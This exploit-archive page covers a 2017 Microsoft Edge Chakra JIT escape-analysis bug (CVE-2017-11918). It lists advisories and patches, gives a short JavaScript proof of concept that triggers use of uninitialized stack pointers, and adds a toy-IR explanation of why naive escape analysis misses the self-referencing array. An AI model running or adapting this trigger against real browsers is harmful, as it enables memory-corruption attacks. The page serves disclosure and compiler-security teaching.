Microsoft Edge Chakra JIT - Escape Analysis Bug Exploit
Reporter | Title | Published | Family |
---|---|---|---|
Packet Storm | Microsoft Edge Chakra JIT Escape Analysis Bug | 10 Jan 2018 00:00 | packetstorm |
Exploit DB | Microsoft Edge Chakra JIT - Escape Analysis Bug | 9 Jan 2018 00:00 | exploitdb |
Symantec | Microsoft Edge Scripting Engine CVE-2017-11918 Remote Memory Corruption Vulnerability | 12 Dec 2017 00:00 | symantec |
Microsoft CVE | Scripting Engine Memory Corruption Vulnerability | 12 Dec 2017 08:00 | mscve |
Microsoft KB | December 12, 2017 - KB4053581 (OS Build 10240.17709) | 12 Dec 2017 08:00 | mskb |
Microsoft KB | December 12, 2017 - KB4053580 (OS Build 15063.786) | 12 Dec 2017 08:00 | mskb |
Microsoft KB | December 12, 2017 - KB4053579 (OS Build 14393.1944) | 12 Dec 2017 08:00 | mskb |
Microsoft KB | December 12, 2017 - KB4054517 (OS Build 16299.125) | 12 Dec 2017 08:00 | mskb |
Microsoft KB | December 12, 2017 - KB4053578 (OS Build 10586.1295) | 12 Dec 2017 08:00 | mskb |
Veracode | Privilege Escalation | 5 Jul 2018 02:11 | veracode |
```javascript
/*
Escape analysis: https://en.wikipedia.org/wiki/Escape_analysis
Chakra fails to detect that "tmp" escapes the scope and allocates it on the stack. This may lead to dereferencing uninitialized stack values.
PoC:
*/
function opt() {
    let tmp = [];
    tmp[0] = tmp;   // the array stores a reference to itself
    return tmp[0];  // ...and that reference leaves the function
}

function main() {
    // Call opt() repeatedly so that it gets JIT-compiled.
    for (let i = 0; i < 0x1000; i++) {
        opt();
    }
    print(opt()); // deref uninitialized stack pointers!
}

main();
```
# 0day.today [2018-03-01] #
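The PoC's `opt()` returns `tmp` only indirectly, through a load from its own element. The following added example (not part of the original report, and not Chakra's code) models that on a toy IR whose op names are invented here. It contrasts a hypothetical naive escape rule with a points-to based rule that follows stores and loads, which is what a JIT needs before it may place an allocation on the stack.

```javascript
// Toy IR for the PoC's opt(); the op names are invented for this example.
const optIR = [
  { op: 'alloc', dst: 'tmp' },              // let tmp = [];
  { op: 'store', obj: 'tmp', val: 'tmp' },  // tmp[0] = tmp;
  { op: 'load', dst: 't1', obj: 'tmp' },    // t1 = tmp[0];
  { op: 'ret', val: 't1' },                 // return t1;
];
// Constructed contrast case: same self-reference, but nothing is returned.
const localOnlyIR = [
  { op: 'alloc', dst: 'tmp' },
  { op: 'store', obj: 'tmp', val: 'tmp' },
  { op: 'ret', val: 'undef' },
];

// Naive rule: an allocation escapes only if its own variable is returned.
function naiveEscapes(ir) {
  const sites = new Set(ir.filter(i => i.op === 'alloc').map(i => i.dst));
  return new Set(ir.filter(i => i.op === 'ret' && sites.has(i.val)).map(i => i.val));
}

// Points-to rule: track which allocations each variable and each object's
// elements may refer to, then mark everything reachable from a return value.
function pointsToEscapes(ir) {
  const pts = new Map();   // variable -> allocation sites it may hold
  const heap = new Map();  // allocation site -> sites stored in its elements
  const get = (m, k) => m.get(k) || m.set(k, new Set()).get(k);
  let changed = true;
  const addAll = (dst, src) => {
    for (const s of src) if (!dst.has(s)) { dst.add(s); changed = true; }
  };
  while (changed) {        // iterate to a fixpoint (flow-insensitive)
    changed = false;
    for (const i of ir) {
      if (i.op === 'alloc') addAll(get(pts, i.dst), [i.dst]);
      if (i.op === 'store') for (const o of get(pts, i.obj)) addAll(get(heap, o), get(pts, i.val));
      if (i.op === 'load') for (const o of get(pts, i.obj)) addAll(get(pts, i.dst), get(heap, o));
    }
  }
  const escaped = new Set();
  const work = ir.filter(i => i.op === 'ret').flatMap(i => [...get(pts, i.val)]);
  while (work.length) {
    const site = work.pop();
    if (escaped.has(site)) continue;
    escaped.add(site);
    work.push(...get(heap, site));
  }
  return escaped;
}

console.log('naive:', [...naiveEscapes(optIR)], 'points-to:', [...pointsToEscapes(optIR)]);
```

The naive rule reports no escaping allocation for `optIR`, so `tmp` would look safe to stack-allocate. The points-to rule reports `tmp` as escaping there, and still allows stack allocation in `localOnlyIR`.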